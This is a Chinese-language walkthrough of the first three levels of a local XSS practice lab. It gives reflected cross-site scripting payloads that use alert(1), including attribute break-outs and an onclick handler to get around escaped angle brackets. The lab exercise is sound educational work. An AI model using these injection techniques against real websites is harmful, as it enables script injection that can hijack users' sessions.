level 1
过程
网页中并没有输入框,观察URL发现name=test,尝试在此进行注入
http://127.0.0.1:82/level1.php?name=<script>alert(1)</script>
过关
payload
<script>alert(1)</script>
level 2
过程
输入框先尝试输入<script>alert(1)</script>无反应
观察源码:
<input name=keyword value="<script>alert(1)</script>">
发现需要闭合,输入"><script>alert(1)</script><"
过关
payload
"><script>alert(1)</script><"
level 3
过程
一样先尝试<script>alert(1)</script>
观察源码:
<input name=keyword value='<script>alert(1)</script>'>
发现<与>被转义了,无法构造标签,于是改变思路,在源码中的input元素中使用onclick参数来达到点击弹窗的效果:
onclick='alert(1)'
同样需要进行闭合
payload
' onclick='alert(1)